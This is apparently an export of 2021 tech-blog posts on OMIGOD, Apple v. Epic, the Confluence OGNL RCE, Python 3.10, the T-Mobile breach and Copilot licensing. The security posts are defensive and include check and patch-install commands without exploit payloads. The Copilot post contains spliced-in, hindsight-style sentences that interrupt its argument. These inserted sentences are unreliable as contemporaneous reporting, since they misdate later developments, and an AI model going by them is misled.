But the OMIGOD disclosure highlights the risk: you\u0026rsquo;re running software you didn\u0026rsquo;t choose, didn\u0026rsquo;t audit, and might not even know about, and it can have critical vulnerabilities.\nThe Patching Gap # Here\u0026rsquo;s where it gets worse. Microsoft released patches for the OMI vulnerabilities as part of Patch Tuesday on September 14. But — and this is critical — simply running Windows Update or applying Azure platform patches does NOT update the OMI agent on your Linux VMs.\nFor most affected Azure services, Microsoft needs to push an updated agent version, and this process is\u0026hellip; not instantaneous. Some services auto-update OMI, but others require manual intervention. The Wiz team documented the patching matrix, and it\u0026rsquo;s confusing — different Azure services have different update mechanisms for OMI.\nSo we have a situation where:\nMicrosoft silently installed vulnerable software on customer VMs Microsoft patched the vulnerability in OMI Microsoft cannot automatically patch many of the affected VMs Customers who didn\u0026rsquo;t know OMI was installed don\u0026rsquo;t know they need to patch it This is a patching nightmare.\nImmediate Actions # If you\u0026rsquo;re running Linux VMs on Azure, here\u0026rsquo;s what to do right now:\nCheck for OMI: SSH into your VMs and check:\ndpkg -l omi # Debian/Ubuntu rpm -qa omi # RHEL/CentOS If OMI is installed, check the version. Anything below 1.6.8-1 is vulnerable.\nBlock the ports: Ensure ports 5985 and 5986 are not accessible from the internet. Check your Network Security Groups (NSGs) immediately. 
Even for internal traffic, restrict access to these ports to only the management subnets that need them.\nUpdate manually if needed:\nwget https://github.com/microsoft/omi/releases/download/v1.6.8-1/omi-1.6.8-1.ssl_110.ulinux.x64.deb sudo dpkg -i ./omi-1.6.8-1.ssl_110.ulinux.x64.deb Check for compromise: Review OMI logs, look for unexpected processes running as root, check for newly created user accounts or SSH keys. If ports 5985/5986 were exposed to the internet, assume breach until you can prove otherwise.\nAudit your Azure service dependencies: Understand which Azure services you\u0026rsquo;ve enabled that might have triggered OMI installation. Consider whether you actually need those services.\nMy Take # I\u0026rsquo;ve been working with cloud infrastructure since the early AWS days, and the implicit trust we place in cloud providers has always made me uncomfortable. We assume that the platform layer is secure, that management agents are benign, and that automatic deployments are in our interest. Most of the time, that trust is warranted. But when it fails, it fails catastrophically.\nOMIGOD is a wake-up call for cloud security posture management. You cannot treat IaaS VMs as if you fully control the software stack. You need to:\nKnow your actual attack surface, including provider-installed agents Enforce network segmentation by default — management ports should never be broadly accessible Monitor for unexpected listening services as part of your security baseline Have an incident response plan that accounts for provider-side vulnerabilities The cloud shared responsibility model says the provider secures the platform and you secure your workload. But when the provider installs software in your workload without your knowledge, the responsibility boundary gets blurry. 
That ambiguity needs to be resolved — with better transparency from cloud providers about what they\u0026rsquo;re deploying, and better tooling for customers to audit their actual VM contents.\nIn the meantime, go check your Azure Linux VMs. Today.\n","date":"16 September 2021","externalUrl":null,"permalink":"/posts/210916-azure-omigod-vulnerability-cloud-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The OMIGOD vulnerabilities in Azure’s silently-installed OMI agent expose a troubling pattern: cloud providers deploying software on your VMs without your knowledge or consent.","title":"OMIGOD — When Your Cloud Provider Installs Vulnerable Agents Without Telling You","type":"posts"},{"content":"The verdict is in, and predictably, both sides are claiming victory. On Friday, Judge Yvonne Gonzalez Rogers issued her ruling in Epic Games v. Apple, and the 185-page decision is far more nuanced than the \u0026ldquo;Apple wins\u0026rdquo; or \u0026ldquo;Epic wins\u0026rdquo; headlines would have you believe. As a developer who\u0026rsquo;s shipped apps through the App Store and dealt with Apple\u0026rsquo;s policies firsthand, I want to cut through the noise and focus on what actually matters for those of us building software.\nThe Ruling in Brief # Here\u0026rsquo;s the TL;DR: Apple won on nine of ten counts. The court found that Apple does not have a monopoly under federal antitrust law. Epic\u0026rsquo;s claims under the Sherman Act were rejected. The court defined the relevant market as \u0026ldquo;digital mobile gaming transactions\u0026rdquo; rather than \u0026ldquo;iOS app distribution\u0026rdquo; — a critical distinction that worked in Apple\u0026rsquo;s favor.\nHowever — and this is the part that matters — Apple lost on one significant count under California\u0026rsquo;s Unfair Competition Law (UCL). 
The court issued a permanent injunction ordering Apple to allow developers to include links and buttons in their apps directing users to external payment mechanisms. Apple has 90 days to comply.\nIn plain terms: developers can now tell users \u0026ldquo;hey, you can also buy this on our website\u0026rdquo; and link them there. What developers cannot do is process payments directly inside the app without going through Apple\u0026rsquo;s in-app purchase system.\nWhat Changes (And What Doesn\u0026rsquo;t) # Let\u0026rsquo;s be precise about what the injunction does and doesn\u0026rsquo;t change.\nWhat changes: The anti-steering provision — Apple\u0026rsquo;s rule that prevented developers from even mentioning alternative payment methods — is struck down. This is actually significant. Previously, if your app had a subscription that cost $9.99/month on the App Store, you couldn\u0026rsquo;t tell users they could subscribe for $7.99/month on your website. You couldn\u0026rsquo;t even acknowledge that your website existed as a purchase channel. That restriction is now enjoined under California\u0026rsquo;s Unfair Competition Law.\nWhat doesn\u0026rsquo;t change: Apple can still require in-app purchases for digital goods bought within the app. Apple can still charge its 15-30% commission on those in-app purchases. Apple still controls what goes in the App Store and on what terms. The 30% \u0026ldquo;Apple tax\u0026rdquo; is not going away.\nWhat\u0026rsquo;s unclear: How Apple will implement this. The devil is in the details. Will Apple allow a simple \u0026ldquo;Subscribe on our website\u0026rdquo; button? Or will they require dense legal disclaimers that make the experience terrible for users? History suggests Apple will comply with the letter of the law while violating its spirit.\nThe Developer Economics # Let\u0026rsquo;s talk about what this means practically. Say you\u0026rsquo;re an indie developer with a SaaS product that has a mobile component. You charge $10/month. 
Under the current regime:\nIn-app purchase: User pays $10, you receive $7 (after Apple\u0026rsquo;s 30% cut, or $8.50 if you qualify for the Small Business Program\u0026rsquo;s 15% rate) Website purchase: User pays $10, you receive approximately $9.70 (after payment processor fees) With the injunction, you can now include a link in your app saying \u0026ldquo;Subscribe at example.com for $10/month.\u0026rdquo; A savvy developer might even offer a small discount for web subscriptions: \u0026ldquo;Subscribe at example.com for $8/month\u0026rdquo; — still earning more per subscriber while passing savings to the user.\nThe question is: will users actually follow these links? The friction of leaving the app, opening a browser, entering payment details\u0026hellip; it\u0026rsquo;s real. Apple\u0026rsquo;s in-app purchase is convenient by design. My guess is that for casual purchases, most users will stay in-app. But for subscriptions and high-value transactions, a meaningful percentage will follow the external link, especially if there\u0026rsquo;s a price incentive.\nFor large developers like Spotify, Netflix, and the gaming companies — who already route users to the web for subscriptions — this is a formal blessing of what they\u0026rsquo;ve been doing informally through workarounds. For smaller developers, it opens a new channel that was previously forbidden.\nThe Broader Platform Question # What I find most interesting about the ruling is what it reveals about the court\u0026rsquo;s view of platform economics. Judge Gonzalez Rogers explicitly acknowledged that Apple earns \u0026ldquo;supracompetitive profits\u0026rdquo; from the App Store — profit margins well above what you\u0026rsquo;d expect in a competitive market. She called Apple\u0026rsquo;s 30% commission \u0026ldquo;extraordinarily high.\u0026rdquo;\nBut she stopped short of calling it monopolistic, because the court\u0026rsquo;s market definition included Android. 
Since users can (in theory) switch to Android, Apple doesn\u0026rsquo;t have monopoly power in the court\u0026rsquo;s view.\nThis is where the ruling feels disconnected from developer reality. Yes, users can switch platforms. But developers can\u0026rsquo;t simply ignore iOS. If you\u0026rsquo;re building a consumer mobile app, you need to be on both platforms. Apple\u0026rsquo;s market share in the US is roughly 55-60%, and its users tend to spend more on apps. Walking away from iOS isn\u0026rsquo;t a realistic option for most developers.\nThe ruling essentially says: Apple\u0026rsquo;s commission is high and arguably unfair, but it\u0026rsquo;s not illegal because competition exists. That\u0026rsquo;s a legally sound conclusion, but it leaves developers in a market with two platforms that both charge similar commissions and have similar restrictions. \u0026ldquo;Competition\u0026rdquo; that produces identical pricing isn\u0026rsquo;t exactly what Adam Smith had in mind.\nWhat Happens Next # Both sides are expected to appeal. Epic has already announced its intention to do so, and Apple will likely appeal the UCL finding. This will end up at the Ninth Circuit, and potentially the Supreme Court.\nIn the meantime, the 90-day clock on the injunction is ticking. Developers should start planning for how to implement external payment links in their iOS apps. Some things to consider:\nDesign the user experience now. How will you present the external payment option? Make it clear, not buried. Set up web payment flows if you don\u0026rsquo;t already have them. Stripe, Paddle, or your payment processor of choice. Price strategy: Will you offer a discount for web purchases? The math probably makes sense for subscriptions. Watch Apple\u0026rsquo;s implementation guidelines closely. They will define exactly what\u0026rsquo;s allowed, and the constraints will matter. My Take # This ruling is a step forward, but a modest one. 
The anti-steering provision was the most developer-hostile aspect of Apple\u0026rsquo;s policies, and striking it down is genuinely positive. But the core economics of the App Store haven\u0026rsquo;t changed. The 30% commission stands. Apple\u0026rsquo;s control over distribution stands. Sideloading remains prohibited on iOS.\nI\u0026rsquo;ve been building software long enough to remember when platform owners didn\u0026rsquo;t extract 30% of every transaction. The web remains the most open platform we have — no gatekeepers, no commissions, no approval process. Every time I deal with App Store policies, I appreciate the web a little more.\nThe real pressure on Apple isn\u0026rsquo;t coming from this ruling. It\u0026rsquo;s coming from regulatory action in the EU (the Digital Markets Act), South Korea\u0026rsquo;s new law requiring alternative payment systems, and the general political momentum toward platform regulation. This court case is one front in a much larger battle.\nFor now, get ready to add that \u0026ldquo;Subscribe on our website\u0026rdquo; button. It\u0026rsquo;s not revolution, but it\u0026rsquo;s progress.\n","date":"9 September 2021","externalUrl":null,"permalink":"/posts/210909-apple-epic-ruling-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The landmark Apple vs. Epic Games ruling is more nuanced than the headlines suggest — here’s what the injunction actually changes for app developers.","title":"Apple vs. Epic Games Ruling — What It Actually Means for Developers","type":"posts"},{"content":"If you\u0026rsquo;re running a self-hosted Atlassian Confluence server, stop reading and go patch it. Right now. CVE-2021-26084 is a critical OGNL injection vulnerability that allows unauthenticated remote code execution, and it\u0026rsquo;s being actively exploited in the wild at scale. 
Mass scanning for vulnerable instances began within days of the advisory, and we\u0026rsquo;re now seeing reports of cryptominers, webshells, and worse being deployed on compromised servers.\nThis is as bad as it sounds.\nThe Vulnerability # The flaw exists in Confluence Server and Data Center versions prior to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0. It\u0026rsquo;s an OGNL (Object-Graph Navigation Language) injection in Confluence\u0026rsquo;s Webwork layer, specifically in how user input gets processed in Velocity templates.\nOGNL injection in Java applications is a well-known attack class — it was behind the catastrophic Apache Struts breach at Equifax in 2017. The pattern is depressingly familiar: user input gets passed into an expression language evaluator without proper sanitization, allowing attackers to execute arbitrary Java code on the server.\nThe proof-of-concept exploits circulating are trivially simple. A single crafted HTTP request to a specific endpoint can achieve code execution. No authentication required. No complex exploit chain. Just a POST request and you own the server.\nAtlassian released patches on August 25, and CISA issued an alert urging immediate patching. But as we\u0026rsquo;ve seen time and again, the patch-to-exploit window has collapsed to days, and many organizations simply cannot patch that fast.\nThe Self-Hosted Dilemma # This vulnerability crystallizes a problem I\u0026rsquo;ve been thinking about for years: the sustainability of self-hosted enterprise software.\nConfluence Server is deployed in thousands of organizations — from small startups to Fortune 500 companies. Each instance is independently managed, independently patched, and independently secured. 
When a critical vulnerability drops, the security of the entire ecosystem depends on thousands of individual administrators reading the advisory, testing the patch, scheduling maintenance windows, and deploying the fix.\nCompare this to Confluence Cloud, where Atlassian patches once and every customer is protected simultaneously. The cloud instance was not affected by CVE-2021-26084.\nI\u0026rsquo;m not suggesting that cloud is inherently more secure — it has its own risk profile, and a vulnerability in the cloud version would affect everyone at once. But the patching problem is fundamentally different. Self-hosted software distributes the patching burden to the least-resourced party: the customer.\nThis pattern repeats across the enterprise software landscape. Exchange Server (ProxyLogon, ProxyShell), SolarWinds, and now Confluence. The organizations running these servers often lack dedicated security teams, have complex change management processes, and run versions several releases behind current.\nThe Operational Reality # Let me paint the picture from the operations side, because I\u0026rsquo;ve lived this scenario more times than I\u0026rsquo;d like to admit.\nYou\u0026rsquo;re running Confluence Server. Maybe it was deployed five years ago by a team that\u0026rsquo;s since moved on. It\u0026rsquo;s on a VM somewhere — maybe in your datacenter, maybe on an EC2 instance that someone provisioned and forgot about. 
It\u0026rsquo;s running an older version because upgrading Confluence is a non-trivial operation that requires downtime, database migrations, and plugin compatibility testing.\nWhen the CVE drops, several things need to happen:\nSomeone needs to notice the advisory That person needs authority to schedule emergency maintenance The team needs to test the patch against their specific configuration and plugins They need a maintenance window (even if \u0026ldquo;emergency,\u0026rdquo; there\u0026rsquo;s often process) They need to actually perform the upgrade without breaking things They need to verify the patch was applied correctly In organizations with mature security operations, this might happen in 24-48 hours. In many organizations? Weeks. Months. Some will never patch at all — the instances will sit there, vulnerable, until they\u0026rsquo;re compromised or decommissioned.\nMeanwhile, the exploit code is public, scanning is automated, and attackers are moving faster than defenders.\nPractical Mitigations # If you can\u0026rsquo;t patch immediately, Atlassian has provided a mitigation script that modifies the affected files in place. It\u0026rsquo;s a temporary measure, not a substitute for patching, but it can buy you time.\nBeyond that:\nNetwork segmentation: Your Confluence server should not be directly accessible from the internet. Put it behind a VPN or reverse proxy with authentication. This single control would have prevented most of the mass exploitation we\u0026rsquo;re seeing.\nWAF rules: If you\u0026rsquo;re running a web application firewall, deploy rules to block OGNL injection patterns. It\u0026rsquo;s not bulletproof, but it adds a layer.\nMonitor for indicators of compromise: Check for unusual processes running as the Confluence user, unexpected outbound network connections, new cron jobs, or modified files in the Confluence installation directory. 
If you\u0026rsquo;ve been running an unpatched instance exposed to the internet, assume compromise until proven otherwise.\nAsset inventory: If you don\u0026rsquo;t know whether you\u0026rsquo;re running Confluence Server somewhere in your environment, that\u0026rsquo;s the bigger problem. Shadow IT instances are breach vectors.\nMy Take # Every major self-hosted software vulnerability reinforces my conviction that the industry is moving toward managed services for good reasons. Not because SaaS is perfect — it\u0026rsquo;s not — but because the patching economics of self-hosted software are broken.\nWhen I started my career, running your own servers was the default. You bought software, installed it on your hardware, and managed the whole stack. That model made sense when the threat landscape was less hostile and when \u0026ldquo;the internet\u0026rdquo; wasn\u0026rsquo;t something every server was expected to be connected to.\nToday, every internet-facing application is under constant automated scanning. The time between vulnerability disclosure and active exploitation is measured in hours, not months. The self-hosted model places an unrealistic patching burden on organizations that, frankly, have other priorities.\nThis doesn\u0026rsquo;t mean self-hosted is always wrong — there are legitimate compliance, data sovereignty, and customization reasons to run your own infrastructure. But if you choose that path, you\u0026rsquo;re accepting the responsibility to patch at the speed of attackers, not at the speed of your change management process.\nIf you\u0026rsquo;re running Confluence Server today, patch it. Then start the conversation about whether self-hosting is the right choice for your organization going forward. 
Atlassian is clearly pushing toward cloud — and incidents like this explain why.\n","date":"2 September 2021","externalUrl":null,"permalink":"/posts/210902-confluence-rce-cve-2021-26084/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The critical Confluence Server RCE vulnerability is being actively exploited in the wild, raising urgent questions about the sustainability of self-hosted enterprise software.","title":"Confluence Under Siege — CVE-2021-26084 and the Self-Hosted Software Problem","type":"posts"},{"content":"Python 3.10 RC1 dropped this week, and while there are plenty of incremental improvements — better error messages, parenthesized context managers, stricter zip behavior — the headline feature is structural pattern matching via the new match/case statements (PEP 634, 635, 636). This is the most substantial syntax addition to Python since async/await in Python 3.5, and it\u0026rsquo;s generating exactly the kind of heated debate you\u0026rsquo;d expect from the Python community.\nMore Than a Switch Statement # Let me address the most common misconception right away: this is not just a switch/case statement. If you\u0026rsquo;re coming from C, Java, or JavaScript and thinking \u0026ldquo;finally, Python gets switch,\u0026rdquo; you\u0026rsquo;re missing the point entirely.\nStructural pattern matching lets you match against the structure of data, destructuring it in the process. 
Here\u0026rsquo;s a simple example:\nmatch command: case {\u0026#34;action\u0026#34;: \u0026#34;move\u0026#34;, \u0026#34;direction\u0026#34;: str(dir), \u0026#34;distance\u0026#34;: int(dist)}: move(dir, dist) case {\u0026#34;action\u0026#34;: \u0026#34;rotate\u0026#34;, \u0026#34;angle\u0026#34;: float(angle)}: rotate(angle) case _: print(\u0026#34;Unknown command\u0026#34;) You\u0026rsquo;re matching against dictionary structure, extracting values, and validating types — all in a single, readable expression. Try doing that with a chain of if/elif statements. You can, of course, but the pattern matching version communicates intent far more clearly.\nWhere it gets truly powerful is with class patterns:\nmatch event: case Click(position=(x, y)) if x \u0026gt; 100: handle_right_click(x, y) case KeyPress(key_name=\u0026#34;q\u0026#34;) | KeyPress(key_name=\u0026#34;Q\u0026#34;): quit() case Drag(start=s, end=e) if distance(s, e) \u0026gt; 10: handle_drag(s, e) This is pattern matching in the ML/functional programming tradition — think Haskell, Rust, Scala, or Elixir. Python is joining a well-established lineage, and it\u0026rsquo;s doing so in a characteristically Pythonic way.\nThe Community Debate # The Python community has been anything but unified on this feature. The PEP went through extensive discussion, multiple revisions, and a Steering Council vote. Critics raise several concerns:\nComplexity: Python has long prided itself on having \u0026ldquo;one obvious way to do it.\u0026rdquo; Pattern matching introduces a second, very different way to handle conditional logic. Will new Python developers struggle with when to use match versus if/elif?\nSoft keywords: match and case are \u0026ldquo;soft keywords\u0026rdquo; — they\u0026rsquo;re only special in the context of a match statement. 
You can still have variables named match and case. This is a pragmatic choice to avoid breaking existing code, but it adds cognitive overhead and complicates tooling.\nOveruse potential: There\u0026rsquo;s a legitimate concern that developers will reach for pattern matching when a simple if statement would suffice. Just because you can match against a pattern doesn\u0026rsquo;t mean you should.\nI\u0026rsquo;ve seen this debate play out before with every major language feature. List comprehensions were controversial. Decorators were controversial. F-strings were controversial. All of them are now beloved, idiomatic Python. I suspect pattern matching will follow the same trajectory, though it\u0026rsquo;ll take longer because the feature is more complex.\nWhere It Shines # Having experimented with the beta releases, I\u0026rsquo;ve found pattern matching most valuable in specific scenarios:\nProtocol/message handling: If you\u0026rsquo;re processing structured messages — JSON-RPC, GraphQL responses, event payloads — pattern matching is a natural fit. The ability to destructure and validate in one expression eliminates a lot of boilerplate.\nAST/tree processing: If you\u0026rsquo;re writing compilers, linters, code analyzers, or any tool that walks tree structures, pattern matching dramatically simplifies the code. This was one of the primary motivations cited in the PEP.\nState machines: Matching against state/event combinations becomes cleaner and more maintainable. The guard clauses (the if conditions in case statements) are particularly useful here.\nCommand dispatching: CLI tools, chatbots, API routers — anything that needs to parse and dispatch structured commands benefits from the expressiveness of pattern matching.\nWhere I\u0026rsquo;d avoid it: simple value comparisons. If you\u0026rsquo;re just checking if status == 200, don\u0026rsquo;t write a match statement. 
The if statement is simpler, more familiar, and equally readable.\nBetter Error Messages: The Unsung Hero # While pattern matching gets the headlines, I\u0026rsquo;m equally excited about the improved error messages in 3.10. The Python team has done significant work to make syntax errors more informative:\n# Python 3.9 SyntaxError: unexpected EOF while parsing # Python 3.10 SyntaxError: \u0026#39;{\u0026#39; was never closed Or for the classic missing colon:\n# Python 3.9 SyntaxError: invalid syntax # Python 3.10 SyntaxError: expected \u0026#39;:\u0026#39; As someone who\u0026rsquo;s mentored junior developers, I cannot overstate how much better error messages improve the learning experience. The number of times I\u0026rsquo;ve watched someone stare at \u0026ldquo;invalid syntax\u0026rdquo; trying to figure out what went wrong — these improvements will save thousands of hours of collective frustration.\nPreparing Your Codebase # If you\u0026rsquo;re running production Python, don\u0026rsquo;t rush to 3.10 on day one — wait for the first maintenance release (3.10.1, likely in December). But do start planning:\nRun your test suite against 3.10 RC1 in CI. Identify any breakage now while there\u0026rsquo;s still time to report issues. Review your type hints. Python 3.10 allows X | Y syntax for union types instead of Union[X, Y]. Combined with ParamSpec from 3.10, your type annotations can get significantly cleaner. Identify pattern matching candidates in your codebase. Look for long if/elif chains that check types or structure. These are natural migration targets. My Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and I\u0026rsquo;ve watched the language evolve from a scripting tool into a serious engineering language. Structural pattern matching is a mature, well-designed feature that fills a real gap. It\u0026rsquo;s not going to replace conditional logic everywhere, nor should it. 
But for the domains where it fits — data processing, protocol handling, tree walking — it\u0026rsquo;s going to make Python code significantly more readable and maintainable.\nThe fact that it took three PEPs and extensive community debate to get right is actually reassuring. Python\u0026rsquo;s governance model works. The feature is better for the scrutiny it received.\nOctober\u0026rsquo;s final release can\u0026rsquo;t come soon enough.\n","date":"26 August 2021","externalUrl":null,"permalink":"/posts/210826-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s first release candidate introduces structural pattern matching — the most significant syntax addition since async/await, and it’s worth understanding deeply.","title":"Python 3.10 RC1 — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"This week, T-Mobile confirmed what security researchers had been warning about for days: a massive data breach affecting over 40 million current, former, and prospective customers. The stolen data includes names, dates of birth, Social Security numbers, and driver\u0026rsquo;s license information — the crown jewels of personal identity. As someone who\u0026rsquo;s spent decades building systems that handle sensitive data, this one hits differently. Not because it\u0026rsquo;s the largest breach ever, but because of how it happened.\nWhat We Know So Far # The breach was first reported when a threat actor began selling data on underground forums, claiming to have obtained records of over 100 million T-Mobile customers. T-Mobile initially confirmed the breach on August 16, and the numbers have been climbing since.\nThe attacker reportedly gained access through an exposed API endpoint — an unsecured gateway that should never have been reachable from the public internet. This is not a sophisticated zero-day exploit or a novel attack vector. 
This is a misconfigured entry point, the kind of vulnerability that basic security hygiene should catch.\nWhat makes this particularly damning is that T-Mobile has been breached multiple times in recent years. In 2020, they disclosed a breach affecting customer data. In 2019, prepaid customer data was exposed. At some point, you have to ask whether the problem is systemic rather than incidental.\nThe API Security Epidemic # APIs have become the backbone of modern architecture. Every microservice, every mobile app, every third-party integration communicates through APIs. But our security practices haven\u0026rsquo;t kept pace with this architectural shift.\nI\u0026rsquo;ve reviewed enough systems over the years to know that API security is consistently the weakest link. Teams invest heavily in front-end security — WAFs, DDoS protection, input validation on web forms — while leaving API endpoints comparatively naked. Common issues I see repeatedly:\nNo authentication on internal APIs that are accidentally exposed externally Overly permissive CORS configurations that effectively disable cross-origin protections Missing rate limiting, allowing attackers to enumerate data at scale Verbose error messages that leak implementation details Lack of API inventory management — teams literally don\u0026rsquo;t know all the APIs they\u0026rsquo;re running The OWASP API Security Top 10, published in 2019, should be required reading for every development team. Broken Object Level Authorization (BOLA) alone accounts for a staggering number of breaches. When an API endpoint lets you access another user\u0026rsquo;s data by simply changing an ID parameter, you\u0026rsquo;ve got a BOLA vulnerability. 
It\u0026rsquo;s embarrassingly simple to exploit and embarrassingly common.\nWhat Should Have Been in Place # For an organization the size of T-Mobile, handling the personal data of tens of millions of people, there are baseline controls that should be non-negotiable:\nAPI Gateway with Zero Trust: Every API endpoint should sit behind a gateway that enforces authentication and authorization. No exceptions. Internal APIs should not be directly reachable from the internet — full stop. Service mesh architectures with mTLS between services aren\u0026rsquo;t just nice-to-have anymore; they\u0026rsquo;re essential.\nContinuous API Discovery: You can\u0026rsquo;t secure what you don\u0026rsquo;t know exists. Tools like Salt Security or runtime API discovery should be in the pipeline. Shadow APIs — endpoints that exist but aren\u0026rsquo;t documented — are breach vectors waiting to happen.\nData Minimization: Why did a single accessible endpoint have access to 40 million records including SSNs? The principle of least privilege applies to data access too. APIs should only return the minimum data necessary for their function, and sensitive fields should be tokenized or encrypted at the field level.\nAnomaly Detection: Exfiltrating 40 million records doesn\u0026rsquo;t happen in a single request. The volume of data access should have triggered alerts long before the full dataset was compromised. Behavioral analytics on API traffic patterns can catch these exfiltration attempts early.\nThe Regulatory Reckoning # What interests me is the regulatory dimension. We\u0026rsquo;re seeing increased scrutiny from the FTC and state attorneys general on data breaches, particularly repeat offenders. T-Mobile\u0026rsquo;s merger with Sprint came with commitments to improve cybersecurity, and this breach raises serious questions about whether those commitments are being met.\nFor those of us building systems, the regulatory landscape is shifting. 
CCPA enforcement is ramping up, and there\u0026rsquo;s increasing talk of federal privacy legislation. The days of treating data breaches as a cost of doing business are numbered.\nMy Take # I\u0026rsquo;ve been building and securing systems since before APIs were a thing, back when SOAP was considered cutting-edge. The fundamental lesson hasn\u0026rsquo;t changed in thirty years: security is not a feature you bolt on after deployment. It\u0026rsquo;s an architectural concern that needs to be addressed from the first design conversation.\nThe T-Mobile breach is frustrating because it was preventable. Not with exotic technology or massive security budgets, but with basic discipline: know your attack surface, authenticate every endpoint, monitor for anomalies, minimize data exposure.\nIf you\u0026rsquo;re reading this and thinking \u0026ldquo;our API security is probably fine\u0026rdquo; — it\u0026rsquo;s probably not. Run an API security audit this quarter. Map your endpoints. Check your authentication. Look for shadow APIs. The next T-Mobile-scale breach is already being set up by an overlooked, unauthenticated API sitting on some forgotten server in someone\u0026rsquo;s cloud account.\nDon\u0026rsquo;t let it be yours.\n","date":"19 August 2021","externalUrl":null,"permalink":"/posts/210819-tmobile-data-breach-api-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The T-Mobile breach exposing 40+ million records highlights systemic failures in API security and data protection that the entire industry needs to address.","title":"T-Mobile's Massive Data Breach — A Wake-Up Call for API Security","type":"posts"},{"content":"It\u0026rsquo;s been about six weeks since GitHub launched Copilot in technical preview, and the initial excitement has given way to a more heated conversation. 
The AI pair programmer, built on OpenAI\u0026rsquo;s Codex model, can generate surprisingly competent code from natural language prompts and context. But the open source community is increasingly asking an uncomfortable question: is Copilot built on a foundation of licensing violations?\nThe debate has been simmering across GitHub Issues, Twitter threads, Hacker News, and mailing lists, and it touches on fundamental questions about how we think about code, copyright, and the training data that powers machine learning models.\nHow Copilot Works (And Why It Matters) # Copilot is powered by OpenAI Codex, a descendant of GPT-3 that\u0026rsquo;s been fine-tuned on publicly available code — primarily from GitHub\u0026rsquo;s own repositories. When you type a comment or start writing a function, Copilot predicts what you\u0026rsquo;re likely to write next, offering multi-line suggestions that can range from boilerplate to surprisingly sophisticated implementations.\nThe technical achievement is impressive. In my own testing during the preview, Copilot correctly generated working implementations for common patterns in Python and JavaScript, often needing only a function name and docstring as input. The evolution of Copilot capabilities would eventually extend far beyond code completion. It handles API calls, data transformations, and algorithmic patterns with reasonable accuracy.\nBut here\u0026rsquo;s where it gets complicated: the model was trained on code from public GitHub repositories. Those repositories carry licences — GPL, MIT, Apache, BSD, and many others. Each licence comes with specific obligations about how the code can be used, modified, and redistributed. 
The question is whether training an ML model on that code, and then reproducing patterns from it in suggestions, constitutes a use that\u0026rsquo;s governed by those licences.\nThe Licensing Argument # The Free Software Foundation has raised concerns about Copilot\u0026rsquo;s relationship with copyleft licences like the GPL. Similar concerns would resurface around open source governance as AI-generated content proliferated. The GPL requires that derivative works also be released under the GPL. If Copilot has learned patterns from GPL-licensed code and suggests those patterns to users who incorporate them into proprietary software, is that a GPL violation?\nThere are reasonable arguments on both sides:\nThe \u0026ldquo;it\u0026rsquo;s fair use\u0026rdquo; position: Training an ML model on publicly available code is a transformative use. The model doesn\u0026rsquo;t store or reproduce code verbatim — it learns statistical patterns and generates new code based on those patterns. This is analogous to a developer reading open source code to learn patterns and then writing similar code in their own projects.\nThe \u0026ldquo;it\u0026rsquo;s a laundering machine\u0026rdquo; position: Copilot has been demonstrated to reproduce substantial portions of code verbatim in some cases, including recognizable snippets from well-known projects — sometimes complete with original comments. If the model can reproduce exact code from training data, it\u0026rsquo;s not just learning patterns; it\u0026rsquo;s memorising and regurgitating copyrighted material, potentially stripping licence attributions in the process.\nThe truth likely sits somewhere in between, and current copyright law isn\u0026rsquo;t well-equipped to adjudicate the question. 
The concept of \u0026ldquo;fair use\u0026rdquo; in the context of ML training data is largely untested in courts, at least with respect to code.\nThe Consent Problem # Beyond the legal question, there\u0026rsquo;s an ethical dimension that resonates with me more strongly. Many open source developers chose specific licences deliberately. A developer who licenses their code under the GPL is making a philosophical statement: this code should remain free and open. A developer who chooses MIT is saying something different: use this however you want, just keep the attribution.\nNeither of those developers explicitly consented to their code being used as training data for a commercial AI product. GitHub\u0026rsquo;s Terms of Service do grant certain rights to GitHub regarding hosted content, but the interpretation of whether those rights extend to ML training is contested. Supply chain security in open source would continue to raise similar trust concerns.\nThis is particularly pointed because GitHub is owned by Microsoft, and Copilot is intended to become a paid product (it is free during the preview, but pricing is coming). The commercialization of AI-assisted development would accelerate rapidly in subsequent years. Open source developers contributed their code freely, and a commercial entity is now using that collective work to build a revenue-generating service. Even if it\u0026rsquo;s legally permissible, the optics are troubling for a company that positions itself as a champion of open source.\nPractical Implications for Developers # If you\u0026rsquo;re using Copilot in the technical preview, here are some practical considerations. Frameworks for responsible AI development would eventually address these licensing and consent questions at a regulatory level.\nReview suggestions carefully: Don\u0026rsquo;t blindly accept Copilot\u0026rsquo;s output. Beyond the licensing question, there are quality and security concerns. 
The model can suggest code with bugs, vulnerabilities, or anti-patterns.\nBe aware of verbatim reproduction: If a suggestion looks too specific or includes unusual variable names and comments, it may be a near-verbatim reproduction of training data. Consider searching for that code on GitHub to check.\nUnderstand your project\u0026rsquo;s licence obligations: If you\u0026rsquo;re working on a permissively licensed project, the risk is lower. If you\u0026rsquo;re working on proprietary code, accepting GPL-derived suggestions could create compliance issues.\nKeep an eye on the legal landscape: This is an evolving situation. The Software Freedom Conservancy and others are actively researching the legal dimensions. Court cases or regulatory guidance could change the picture significantly.\nMy Take # I\u0026rsquo;ve been writing and using open source software for most of my career, and I have mixed feelings about Copilot. The technology is genuinely useful — it accelerates boilerplate coding and can help developers explore unfamiliar APIs. As a productivity tool, it\u0026rsquo;s impressive.\nBut I\u0026rsquo;m uncomfortable with the training data approach. The open source ecosystem is built on a social contract: developers share their work under specific terms, and users respect those terms. Using that collective output as training data for a commercial product without explicit consent feels like it bends, if not breaks, that social contract.\nI don\u0026rsquo;t think the answer is to stop building AI coding tools — the genie isn\u0026rsquo;t going back in the bottle. But I\u0026rsquo;d like to see more transparency from GitHub and OpenAI about the training data, better mechanisms for developers to opt out of training, and serious engagement with the licensing questions rather than hand-waving about fair use.\nThe open source community built the platform that Copilot stands on. 
